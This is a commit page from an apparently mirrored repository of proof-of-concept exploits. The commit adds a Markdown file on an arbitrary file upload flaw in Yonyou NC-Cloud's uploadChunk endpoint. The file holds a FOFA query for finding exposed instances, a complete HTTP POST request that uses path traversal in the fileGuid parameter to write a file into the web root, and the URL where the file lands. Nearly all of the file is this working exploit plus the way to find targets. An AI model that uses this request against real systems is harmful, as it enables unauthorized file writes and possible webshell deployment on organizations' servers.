admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 用友NC-Cloud uploadChunk 任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-10-21 10:42:15 +08:00 committed by GitHub
parent 2aab30e340
commit 6a669f6568
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
用友NC-Cloud uploadChunk 任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,21 @@
## 用友NC-Cloud uploadChunk 任意文件上传漏洞
## fofa
```
app="用友-NC-Cloud"
```
## POC
```
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;
Content-Disposition: form-data; name="file"; filename="test.txt"
{{randstr}}
--024ff46f71634a1c9bf8ec5820c26fa9--
```
文件上传路径访问
/nccloud/test.txt